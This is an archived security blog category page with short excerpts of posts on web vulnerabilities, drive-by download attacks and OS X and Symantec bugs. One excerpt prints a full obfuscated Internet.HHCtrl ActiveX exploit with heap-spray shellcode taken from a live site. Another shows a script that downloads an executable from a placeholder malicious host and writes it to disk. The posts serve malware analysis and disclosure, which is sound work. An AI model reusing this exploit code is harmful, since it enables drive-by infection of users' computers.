You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Category Archives: Vulnerabilities

buffers and the people who overflow them

WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here. The code snippets from a digitalpoint.com forum are shown using base64 encoding […]

Top 2007 Symantec Vulnerabilities

MAY 25, 2006 | EEye Digital Security revealed this afternoon a software vulnerability inside Symantec’s Anti-Virus Corporate Edition 10.0. The vulnerability warning, posted on the vendor’s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today […]

Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list. I ended up here reading about a java based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone […]

Internet.HHCtrl.1 Exploit

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software…. <script> t=”60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62″ t=eval(“String.fromCharCode(“+t+”)”); document.write(t); </script> </HEAD><BODY onload=BuildContext();> <BUTTON id=x onclick=ClickTo();> […]

another variation of drive by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control. [zero@day testing]$ curl http://EVIL_SITE/db/wm.htm <script> var url,path; url=”http://EVIL_SITE/mc/game/db.exe”; path=”C:\\boot.exe”; try{ var ado=(document.createElement(“object”)); var d=1; ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var e=1; var xml=ado.CreateObject(“Microsoft.XMLHTTP”,””); var f=1; var ab=”Adodb.”; var cd=”Stream”; var g=1; var as=ado.createobject(ab+cd,””); var h=1; xml.Open(“GET”,url,0); […]

Hi, I’m a Mac

And I can get 0wned just like you PC. * ImageIO CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465 Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079 Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution Description: Buffer overflows were discovered in TIFF tag […]

More attacks on my web server [Elf Kaiten.AQ]

the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time. EDIT: More information here documented by enkrypted UPDATE: Secunia reports this as Elf Kaiten.AQ TrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring […]

Interesting attacks on my web server

Still think that firewall is enough to protect your web server? Port 80 to the rescue! Through a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and […]

Latest on OS X research

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. it’s an interesting mixture of bugs which consists of mostly Heap Overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help […]